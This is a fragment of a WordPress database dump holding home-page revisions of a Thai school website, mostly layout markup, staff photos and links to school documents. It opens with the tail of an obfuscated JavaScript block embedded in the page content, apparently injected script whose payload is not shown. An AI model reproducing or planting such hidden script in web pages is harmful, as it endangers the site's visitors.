_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:49:22','2025-06-27 08:49:22','',19,'http://watprato.ssk.in.th/?p=588',0,'revision','',0),
(590,1,'2025-06-27 15:50:56','2025-06-27 08:50:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6d769e-f5\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6d769e-f5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"ด้านผลงานวิชาการที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_ed3ec7-1c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_ed3ec7-1c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-538\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a 